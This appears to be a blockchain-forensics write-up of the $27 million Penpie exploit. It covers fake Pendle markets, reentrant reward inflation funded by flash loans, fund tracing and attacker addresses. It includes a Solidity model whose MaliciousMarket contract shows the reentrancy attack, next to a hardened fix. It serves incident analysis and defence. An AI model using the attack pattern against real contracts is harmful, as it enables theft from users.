# The Penpie Heist

On September 3rd, 2024, [**Penpie**](https://www.pendle.magpiexyz.io/stake), a yield-boosting protocol built on the [**Pendle Finance**](https://www.pendle.finance/) ecosystem, suffered a major exploit that led to the loss of approximately **$27 million** in crypto assets. The attacker registered a fake Pendle market with Penpie, backed by malicious contracts posing as SY (Standardized Yield) tokens and wrapped in Pendle Liquidity Provider Tokens (LPT). Through that market the attacker artificially inflated the rewards Penpie credited to them and redeemed those rewards for real assets, including **wrapped staked ETH (wstETH)**, **agETH**, **rswETH**, **sUSDe**, and, on Arbitrum, **gUSDC**.

## **Penpie’s Role in Pendle Finance**

Penpie plays a pivotal role within the **Pendle Finance ecosystem** by offering yield optimization and boosting services using **veTokenomics (Voting Escrow Tokenomics)**. Through Penpie, users can lock **PENDLE tokens**, gain governance rights, and maximize both their rewards and governance participation. These functionalities are critical in enhancing the overall utility and growth of Pendle Finance.

## **Attack Overview and Initial Response**

Following the exploit, both **Penpie** and **Pendle Finance** promptly halted their operations to limit further damage. Despite these measures, the exploit significantly impacted the tokens associated with both protocols. **Penpie’s native token (PNP)** saw a dramatic **40% drop** in value, while **PENDLE** itself experienced a **9% decline**. This rapid devaluation highlights the far-reaching consequences of security vulnerabilities in decentralized finance (DeFi) ecosystems.

### **Pendle and Penpie Terminology**

* **SY** (Standardized Yield) tokens are the contracts that wrap any yield-bearing token into a standard interface.
* **PT** (Principal Tokens) represent the principal, redeemable for the underlying asset at the market's maturity date.
* **YT** (Yield Tokens) represent the yield the underlying asset generates until maturity.
* **LPT** (Liquidity Provider Tokens) certify that the holder provided liquidity to a Pendle market.
* **PRT** (Pool Reward Tokens) are the receipt a depositor gets after staking Pendle LPT into a Penpie pool.

### **Addresses and Transactions**

* **Main Attacker Address**: 0x7a2f4d625fb21f5e51562ce8dc2e722e12a61d1b
* **Malicious SY Contracts:**
  1. 0x4af4c234b8cb6e060797e87afb724cfb1d320bb7
  2. 0x4476b6ca46b28182944ed750e74e2bb1752f87ae
  3. 0xcde2cd6aeaaf0238f4ce33295be13704e4a97de2
  4. 0x4BC9815b859c8172CEe1ab2CD372fD0Eb00eb487

* **Key Exploit Transactions**:
  1. 0x42b2ec27c732100dd9037c76da415e10329ea41598de453bb0c0c9ea7ce0d8e5 (Ethereum)
  2. 0x7e7f9548f301d3dd863eac94e6190cb742ab6aa9d7730549ff743bf84cbd21d1 (Ethereum)
  3. 0x56e09abb35ff12271fdb38ff8a23e4d4a7396844426a94c4d3af2e8b7a0a2813 (Ethereum)
  4. 0x67c5400da117b906f8c0fc5f5149e4ea10ed6358cd9ea2ec0ed8f559d757b7df (Arbitrum)

## Decoding the Exploit

The root cause of the exploit was **Penpie's flawed assumption** that any market created on Pendle was legitimate and could be registered as a Penpie pool. The attacker deployed malicious **SY contracts** (three on Ethereum and one on Arbitrum) and used them to mint counterfeit tokens, including **PT-stETH 26DEC2024 (Principal Tokens)** and **YT-stETH 26DEC2024 (Yield Tokens)**. By supplying these counterfeit tokens to a market they controlled, the attacker obtained **Liquidity Provider Tokens (LPT)**, which were then deposited into **Penpie's pool** in exchange for **Pool Reward Tokens (PRT)**.

The attacker then targeted the **batchHarvestMarketRewards()** function of the **Pendle Staking contract**. That function harvests a market's rewards by recording the staking contract's balance of each reward token, calling the market's reward redemption, and booking the balance increase as rewards owed to that market's stakers. The malicious SY contract declared legitimate Pendle LP tokens as its reward tokens. Using **flash loans** from **Balancer** (a DeFi protocol) in **sUSDe**, **wstETH**, **agETH** and **rswETH**, the attacker minted real Pendle LP tokens and, from inside the malicious SY contract's **redeemRewards()** callback, deposited them into the staking contract while the harvest was still in progress. The balance-difference accounting treated that deposit as rewards earned by the fake market, so the attacker's claimable rewards were inflated to roughly the size of the flash loan.

The key vulnerability was the **absence of a reentrancy guard** on this harvest path. batchHarvestMarketRewards() makes an external call into an untrusted, attacker-supplied market, and nothing stopped that call from reentering the staking contract's deposit function before the harvest finished its accounting. Because the attacker was the sole depositor in the fake market's Penpie pool, the entire inflated reward was credited to them, and they repeated the cycle in further transactions with fresh malicious contracts.

Once the rewards were credited, the attacker claimed them, burned the PRT tokens, withdrew the liquidity, and redeemed the proceeds. The flash loans were repaid within the same transaction, and after four rounds (three on Ethereum and one on Arbitrum) the attacker walked away with nearly **$27 million**.

This attack underscores the critical need for **market validation** (an allowlist rather than trusting any market a factory produces), **reentrancy protections** on every function that calls into external markets, and **reward accounting** that does not rely on raw balance differences measured around an untrusted call.
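The harvest path described above, reduced to a minimal Solidity model. This is an added example written for this write-up, not Penpie's or Pendle's code: the contract names, the reward-accounting details and `MaliciousMarket` are hypothetical stand-ins for PendleStaking's batchHarvestMarketRewards()/depositMarket() and the attacker's fake SY/market. The vulnerable staking contract is shown beside a hardened version that allowlists markets and guards deposit and harvest with one shared reentrancy lock.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustrative model written for this write-up, not Penpie's or Pendle's code.
// Contract names, the reward-accounting details and MaliciousMarket are
// hypothetical; they mirror the batchHarvestMarketRewards()/depositMarket()
// interaction discussed above.

interface IERC20 {
    function balanceOf(address a) external view returns (uint256);
    function transferFrom(address f, address t, uint256 v) external returns (bool);
    function approve(address s, uint256 v) external returns (bool);
}

interface IMarket {
    function getRewardTokens() external view returns (address[] memory);
    function redeemRewards(address user) external;
}

// ---- Vulnerable: anyone can register a market, harvest has no reentrancy guard ----
contract VulnerableStaking {
    mapping(address => bool) public registered;                      // market => accepted
    mapping(address => mapping(address => uint256)) public staked;  // market => user => LP
    mapping(address => mapping(address => uint256)) public rewards; // market => token => owed

    // Mirrors the flawed assumption: any Pendle market is accepted as-is.
    function registerMarket(address market) public virtual { registered[market] = true; }

    // In Pendle the market contract is also its LP token, hence transferFrom(market).
    function depositMarket(address market, uint256 amount) public virtual {
        require(registered[market], "unknown market");
        IERC20(market).transferFrom(msg.sender, address(this), amount);
        staked[market][msg.sender] += amount;
    }

    function batchHarvestMarketRewards(address[] calldata markets) public virtual {
        for (uint256 i = 0; i < markets.length; i++) {
            address m = markets[i];
            address[] memory toks = IMarket(m).getRewardTokens();
            uint256[] memory pre = new uint256[](toks.length);
            for (uint256 j = 0; j < toks.length; j++) {
                pre[j] = IERC20(toks[j]).balanceOf(address(this));
            }
            IMarket(m).redeemRewards(address(this)); // call into attacker-controlled code
            for (uint256 j = 0; j < toks.length; j++) {
                // Balance-delta accounting: every token that arrived during the
                // call, including LP pushed in by a reentrant depositMarket(),
                // is booked as reward owed to this market's stakers.
                rewards[m][toks[j]] += IERC20(toks[j]).balanceOf(address(this)) - pre[j];
            }
        }
    }
}

// ---- Fake market/SY: names a real Pendle LP token as its "reward token" and
//      reenters depositMarket() from inside redeemRewards() ----
contract MaliciousMarket is IMarket {
    VulnerableStaking public immutable staking;
    address public immutable legitLp; // genuine LP token already registered in staking

    constructor(VulnerableStaking s, address lp) { staking = s; legitLp = lp; }

    function getRewardTokens() external view returns (address[] memory t) {
        t = new address[](1);
        t[0] = legitLp;
    }

    function redeemRewards(address) external {
        uint256 amt = IERC20(legitLp).balanceOf(address(this)); // flash-loaned LP held here
        IERC20(legitLp).approve(address(staking), amt);
        staking.depositMarket(legitLp, amt); // reentrancy: the harvest's delta now equals amt
    }
}

// ---- Hardened: markets must be allowlisted by the owner; deposit and harvest
//      share one reentrancy lock, so the callback above reverts ----
contract HardenedStaking is VulnerableStaking {
    address public immutable owner;
    uint256 private lock = 1;

    constructor() { owner = msg.sender; }

    modifier nonReentrant() { require(lock == 1, "reentrant"); lock = 2; _; lock = 1; }

    function registerMarket(address market) public override {
        require(msg.sender == owner, "not owner"); // validate markets instead of trusting factories
        super.registerMarket(market);
    }

    function depositMarket(address market, uint256 amount) public override nonReentrant {
        super.depositMarket(market, amount);
    }

    function batchHarvestMarketRewards(address[] calldata markets) public override nonReentrant {
        super.batchHarvestMarketRewards(markets);
    }
}
```

Deployed against `VulnerableStaking`, a single harvest of the fake market books the full flash-loaned LP amount as rewards owed to a pool in which the attacker is the only staker. Against `HardenedStaking` the same callback reaches `depositMarket()` while `lock == 2` and the whole harvest reverts; and unless the owner allowlists it, the fake market is never registered in the first place.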

## Hack Breakdown and Timeline

#### **1. Creation of Malicious Contracts and Tokens at 1:41 PM on 3rd September**

At 1:41 PM on September 3rd, the attacker deployed the first malicious SY contract and used it to mint **fake PT and YT tokens** backed by no real underlying asset. (*Tx-0xfda0dde38fa4c5b0e13c506782527a039d3a87f93f9208c104ee569a642172cd2*)

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2F4ts7WfpIknX0q5UVEejZ%2FScreenshot%202024-10-12%20201214.png?alt=media&#x26;token=3cc3c6ee-3379-4348-bc34-f9fca117b57b" alt=""><figcaption><p>Creation of first Malicious Contract</p></figcaption></figure>

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2FuhtMDnykw81e5k5MF3uV%2FScreenshot%202024-10-12%20201344.png?alt=media&#x26;token=075bb6ea-fa2b-4eec-a33f-b82abc600ef9" alt=""><figcaption><p>Attack contract as SY contract with PT and YT tokens</p></figcaption></figure>


#### **2. Creation of Fake Pendle Market at 1:44 PM on 3rd September**

By **1:44 PM**, the attacker had used the malicious tokens to create a fake Pendle market and register it with Penpie. This market, which the attacker fully controlled, was the vehicle for manipulating Penpie's reward accounting. (*Tx-0xfda0dde38fa4c5b0e13c506782527a039d3a87f93f9208c104ee569a642172d2*)

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2FB5te1pqtAcFIXOtp6Xjn%2FScreenshot%202024-10-12%20201901.png?alt=media&#x26;token=7bcc11bb-8646-4260-93aa-30cff6e439b1" alt=""><figcaption><p>Creation of Fake Market</p></figcaption></figure>

#### **3. First Attack Execution at 2:23 PM on 3rd September**

The attacker used a second address, **Attacker 2** (*0xc0eb7e6e2b94aa43bdd0c60e645fe915d5c6eb84*), for the first attack, taking **flash loans** from **Balancer** in **wstETH, sUSDe, agETH**, and **rswETH** to supply the liquidity the exploit needed.

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2FMxfchyNwVhMKjG4YBhl7%2FScreenshot%202024-10-12%20202531.png?alt=media&#x26;token=58141bee-94e9-49f9-baa1-124236b7e6c8" alt=""><figcaption><p>Flash Loan from Balancer</p></figcaption></figure>

With that liquidity in hand, the attacker called batchHarvestMarketRewards() on the fake market. The harvest invoked the malicious SY contract's redeemRewards() callback, which deposited the flash-loaned liquidity into the staking contract mid-harvest, so Penpie booked the deposit as rewards and let the attacker claim them despite having provided no real liquidity of their own.

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2FhY04yRJnE9DekghlbdR8%2FScreenshot%202024-10-12%20202927.png?alt=media&#x26;token=26ac658e-e359-4e82-b201-5b63fc36d9d0" alt=""><figcaption><p>The Attack</p></figcaption></figure>

After removing all the liquidity, withdrawing the rewards and repaying the flash loans, the exploiter transferred the funds from the attack contract to Attacker 1 at 2:27 PM (*Tx-0x5f348e5d7802bdfcb5e3b7515d8d0a50c6a1067cf2fe6633334abce4bc2ee8f0*).

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2Fl9IUdUw2RLM36OXslMkd%2FScreenshot%202024-10-12%20204220.png?alt=media&#x26;token=90d9730f-ac29-4d96-8e50-c15cb6aedec4" alt=""><figcaption><p>Transfer of rewards</p></figcaption></figure>

#### **4. Creation of another Malicious SY Contract at 2:31 PM on 3rd September**

The attacker then repeated the same strategy by deploying a new malicious SY contract.

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2F9aVkOMyopz6mIvlvTL9y%2FScreenshot%202024-10-12%20205451.png?alt=media&#x26;token=d7c7a9e2-b4a9-4fb4-8273-269d496cbaa5" alt=""><figcaption><p>Creation of a new malicious SY Contract</p></figcaption></figure>

One important detail: all the fake tokens were minted through Pendle's **PendleYieldContractFactory** contract, and every fake market was created through **PendleMarketFactoryV3**. Because the attacker went through Pendle's own factories, the mere existence of a Pendle market was no evidence of legitimacy, which is exactly the assumption Penpie relied on.

The purpose of the fake YT and PT tokens was to obtain LPT, and through them PRT, as proof of providing liquidity, so that the inflated rewards would be credited to the attacker's position.

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2FWaqH0M0odYIipEVBMxyg%2FScreenshot%202024-10-12%20210142.png?alt=media&#x26;token=3558c114-6eef-4368-8ccf-01105203f42b" alt=""><figcaption><p>YT and PRT tokens</p></figcaption></figure>

#### **5. The Second Attack at 2:37 PM on 3rd September**

Now holding PRT and YT tokens, the attacker went back to the Balancer Vault and borrowed large amounts of agETH and rswETH through flash loans.

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2FtMynNpJewkl9lx1aeMSl%2FScreenshot%202024-10-12%20210832.png?alt=media&#x26;token=bfb36e27-4050-4210-b9a1-e67242f978e4" alt=""><figcaption><p>Second Flash Loan from Balancer</p></figcaption></figure>

They then exploited batchHarvestMarketRewards() on the pool again, triggering the redeemRewards() function of the new fake market (0x5b6c...), which set the two new market tokens as the rewards and deposited them into the Penpie pool; the attacker, as the only depositor, then called multiclaim() on the Master Penpie contract to collect them.

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2Fje49VHnJ8Vz1sYP96FSK%2FScreenshot%202024-10-12%20211854.png?alt=media&#x26;token=0585a615-036a-4679-8e5e-3d1b9e30bf05" alt=""><figcaption><p>The Second Attack</p></figcaption></figure>

This let the attacker withdraw the LPT tokens. Finally, they burned the PRT tokens, withdrew all the rewards and liquidity, repaid the flash loans, and kept the difference as profit.

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2FU06dmTRv1sFP4W9iDD0k%2FScreenshot%202024-10-12%20213415.png?alt=media&#x26;token=49a7a126-6e31-4d06-9ae5-a17c61173e10" alt=""><figcaption><p>Rewards</p></figcaption></figure>

#### **6. Creation of Another Malicious SY contract at 2:38 PM on 3rd September**

The attacker ran the same strategy a third time in the same fashion, gaining more agETH and rswETH.

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2FWhMnZs26W6kyeSb9ZXhL%2FScreenshot%202024-10-12%20215612.png?alt=media&#x26;token=dd5ceebb-b1a2-4565-adb7-b4f94d7c21c1" alt=""><figcaption><p>Third Attack</p></figcaption></figure>

## Tracing the Funds

Using **Blockscope’s Tracer** tool, we identified the paths taken by the attacker to obscure the stolen funds. The image below shows the transfer of funds to the Attacker from various Malicious contracts.

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2FYk8w0c4owbTSfO64JtFV%2FScreenshot%202024-10-12%20220220.png?alt=media&#x26;token=0eb1a15f-9685-4cda-b16a-e1014c0d72f6" alt=""><figcaption><p>Attacker and Malicious SY contracts</p></figcaption></figure>

The majority of assets were funneled through **Tornado Cash**, making further tracking difficult. The visualization also highlights the **Rubic Offset Router** being used to swap rewards, and the intermediary addresses that facilitated the tunneling of funds.

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2FLpYyKhSgkOIC3eBQXLxX%2FScreenshot%202024-10-12%20220741.png?alt=media&#x26;token=9e5f7e77-6546-4537-94f2-32fcf3942406" alt=""><figcaption><p>Tunneling of Funds</p></figcaption></figure>

## Associated Addresses

Let's look at the major addresses involved in this Penpie exploit. We found many addresses and wallets, but list only the ones relevant to the flow of funds. Using our Cohort Analysis, we have visualized the major wallets and contracts involved in this exploit.

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2FUry0BdsDNG87QJVNeXkS%2FScreenshot%202024-10-12%20222835.png?alt=media&#x26;token=15de5d4c-8ddd-4986-a069-9e19351d8cfa" alt=""><figcaption><p>Cohort Analysis</p></figcaption></figure>

### List of all the Associated Addresses

| Identity                       | Detail                                                       | Address                                    |
| ------------------------------ | ------------------------------------------------------------ | ------------------------------------------ |
| Main Attacker                  | The main attacker wallet of the the exploit                  | 0x7a2f4d625fb21f5e51562ce8dc2e722e12a61d1b |
| Attacker 2                     | Wallet used to transfer funds with first SY contract exploit | 0xc0eb7e6e2b94aa43bdd0c60e645fe915d5c6eb84 |
| Attacker 3                     | Used for tunneling and off boarding funds                    | 0x28e3fd9edca8fccb912fe3ab36c78f96cfc74769 |
| Attacker 4                     | Used for tunneling and off boarding funds                    | 0x69751b7e52dbbd64281ec9049dfa623c7ecdeb52 |
| Attacker 5                     | Used for tunneling and off boarding funds                    | 0x2f2dde668e5426463e05d795f5297db334f61c39 |
| Attacker 6                     | Used for tunneling and off boarding funds                    | 0x2dc15e0ff02f39d4d23a96d6ef2595df3d1e18a0 |
| Attacker 7                     | Used for tunneling and off boarding funds                    | 0x415a7916c0f52a95f16034d74fb89528c0fc1b11 |
| Attacker 8                     | Used for tunneling and off boarding funds                    | 0x8c37ad70ce51e54d2d75da40668e9530d337f26b |
| Attacker 9                     | Used for tunneling and off boarding funds                    | 0x688413d6cae1c0e0882e274a98e0b901fdf7233c |
| Attacker 10                    | Used for tunneling and off boarding funds                    | 0xf61aa5fdb43ecbb90ff12086045c9432eee3d03e |
| Attacker 11                    | Used for tunneling and off boarding funds                    | 0x10f8c81386a2563f687011f4ebc8f2091cb501e8 |
| Attacker 12                    | Used for tunneling and off boarding funds                    | 0x37767e2d9131c84441567da5474158b0918b65a4 |
| Malicious SY Contract          | Contract used in first attack                                | 0x4af4c234b8cb6e060797e87afb724cfb1d320bb7 |
| Malicious SY Contract 2        | Contract used in second attack                               | 0x4476b6ca46b28182944ed750e74e2bb1752f87ae |
| Malicious SY Contract 3        | Contract used in third attack                                | 0xcde2cd6aeaaf0238f4ce33295be13704e4a97de2 |
| Malicious Contract on Arbitrum | Contract used in the attack on Arbitrum                      | 0x4BC9815b859c8172CEe1ab2CD372fD0Eb00eb487 |

## Notable Observations

**Cross-Chain Exploit**:\
The attack was executed not only on Ethereum but also on **Arbitrum**, where the attacker leveraged flash loans in **gUSDC** and exploited the protocol similarly using another malicious contract (0x4bc9815b859c8172cee1ab2cd372fd0eb00eb487).

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2FvVVda1gDVXE1NEQUBZjz%2FScreenshot%202024-10-12%20225246.png?alt=media&#x26;token=8a3b4fff-406a-47cb-8078-94c025aa0865" alt=""><figcaption><p>Attack on Arbitrum</p></figcaption></figure>

**Audited Protocols**:\
Despite audits by [**WatchPug**](https://www.watchpug.org/) and [**Zokyo**](https://zokyo.io/), the missing reentrancy guard and the unvalidated-market assumption that enabled this attack went undetected. This highlights the necessity for ongoing audits and real-time monitoring.

**Messages to Attacker**:\
Numerous messages were sent to the attacker post-exploit, including offers of assistance from bounty hunters and others who were attempting to capitalize on the situation.

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2Fdi6royzLYcb7DyLLCqL4%2FScreenshot%202024-10-12%20225743.png?alt=media&#x26;token=02f95b73-9072-400a-a86a-913a42f38530" alt=""><figcaption><p>Message from Victim</p></figcaption></figure>

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2F0ADwQxkTgoT4eEkS3zyY%2FScreenshot%202024-10-12%20225933.png?alt=media&#x26;token=ba3c49eb-c0f2-4f86-8c68-712938dfd028" alt=""><figcaption><p>Anonymous Message</p></figcaption></figure>

## Monitoring

We’ve activated **Blockscope’s Watchtower** to continuously monitor transactions involving more than 12 addresses linked to the [**$27 Million Penpie Hack**](https://www.blockscope.co/community/watchtowers/670e6e844de553085e827486). Our public watchtower provides real-time surveillance, ensuring no suspicious movement goes unnoticed as we work to track and analyze the attacker's activities.

## Conclusion

The **$27 million Penpie exploit** serves as a reminder of the vulnerabilities that persist in the DeFi ecosystem, despite audits and security checks. Strengthening market validation processes and implementing better safeguards like **reentrancy guards** and real-time monitoring systems are essential to prevent such devastating attacks in the future.

**Investigation by:** [**Tushar Tiwari**](https://in.linkedin.com/in/tushar-tiwari-1380271b7)**, Analyst @** [**Blockscope**](https://www.blockscope.co/)

<figure><img src="https://4007608688-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJC2lW6PBpc9zNSjRD2ut%2Fuploads%2Fjk7n8oyLnM19PJJkqu3n%2Fimage.png?alt=media&#x26;token=0a8dbf3e-7896-4a68-8af0-7cd431e3f85b" alt=""><figcaption></figcaption></figure>

**Disclaimer: Best Effort Investigation**

This investigation and its findings represent our best effort based on the information available at the time. However, please be aware of the following limitations:

* The data used in this investigation may contain inaccuracies, omissions, or errors.
* Information sources may be incomplete or subject to change.
* New evidence may emerge that could alter the conclusions.
* Analysis and interpretations are based on current understanding and may evolve.

We have made every reasonable attempt to ensure accuracy, but cannot guarantee that all information is entirely correct or complete. This report should be considered a snapshot of our current knowledge and understanding, subject to revision as new information becomes available.
